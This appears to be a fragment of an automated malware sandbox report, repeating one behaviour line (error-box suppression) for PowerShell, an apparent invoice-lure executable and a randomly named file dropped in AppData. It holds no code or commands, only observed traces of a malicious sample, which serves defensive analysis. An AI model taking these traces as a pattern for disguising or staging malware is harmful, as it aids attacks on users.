                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeProcess information set: NOOPENFILEERRORBOX
